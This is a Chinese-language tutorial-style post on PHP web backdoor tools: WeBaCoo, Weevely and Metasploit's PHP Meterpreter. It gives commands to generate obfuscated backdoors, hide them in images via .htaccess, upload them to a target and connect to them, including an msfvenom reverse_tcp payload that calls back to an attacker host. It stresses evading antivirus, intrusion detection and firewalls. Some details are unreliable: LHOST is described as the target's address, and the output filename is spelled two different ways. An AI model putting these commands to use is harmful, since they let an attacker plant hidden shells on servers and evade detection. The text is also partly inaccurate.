WeBaCoo

WeBaCoo（Web Backdoor Cookie）是一款隐蔽的脚本类Web后门工具。借助HTTP协议，它可以在客户端和服务器端实现执行代码的网页终端。

WeBaCoo有两种工作模式：

• Generation（生产线模式）：指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payload
• Terminal（终端模式）：指定-t选项可进入这种模式，用户可以在这种模式下连接到被测主机的后门程序。

WeBaCoo的精妙之处在于，Web服务器和客户端之间的通信载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防御系统、网络防火墙和应用程序防火墙都无法检测到后门的所在。

WeBaCoo的HTTP Cookie中以下三个参数最为重要：

• cm:以base64编码的shell指令
• cn:加载着编码后输出内容的Cookie名称
• cp：封装编码后输出内容的分隔符

如需启动WeBaCoo程序，可以在终端输入下述命令：

与生成模式有关的命令行选项如下：

选项	描述
-g	制作后门代码
-f	后门所需要的PHP功能 system(default) shell_exec exec passthru popen
-o	指定生成的后门程序的文件名

如果要使用默认的设置，生成名为test.php的PHP后门程序，并使用WeBaCoo的代码混淆技术对后门进行处理，那么可以使用下述命令

webacoo  -g    -o    test.php

文件test.php内容如下：

而后，包这个文件上传到被测主机上去

接下来就可以使用下面的命令连接到被测主机的后门程序了：

webacoo -t -u http://ip/test.php

WeBaCoo后门的客户端和服务器端的通信是不易发现的、

Weevely

Weevely是一款具有高隐蔽性的针对PHP平台的WEBShell。它实现了SSH风格的终端界面，并有大量自动化的模块。测试人员可用它来执行系统命令、远程管理和渗透后期的自动渗透界面。

Weevely的主要用途是：

• 生成混淆的PHP backdoor
• 在图像文件中追加多态后门程序，并可以通过。htaccess文件赋予图像文件执行权限。
• 生成后门。htaccess文件。
• 可通过help选项列出程序的全部模块和生成工具

使用夏磊指令可以生成混淆PHP backdoor，并将后门保存为display.php

weevely generate password display.php

之后还是以一样，上传到目标机器上

之后链接WEBshell即可

PHP Meterpreter

Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP webShell。利用目标的漏洞（诸如常见的注入、文件上传漏洞）之后，再把它的shell传到目标主机即可。

Metasploit 的msfvenom工具可以制作PHP Meterpreter，具体指令如下：

msfvenom -p  php/meterpreter/reverse_tcp LHOST=192.168.x.x   -f   raw >php-meter.php

上述指令各选项的作用如下：

-p :指定payload为php/meterpreter/reverse_tcp

-f：设置输出格式（raw）

LHOST :设定目标主机的IP地址

Metasploit会把生成的PHP Meterpreter保存为文件php-mter.php。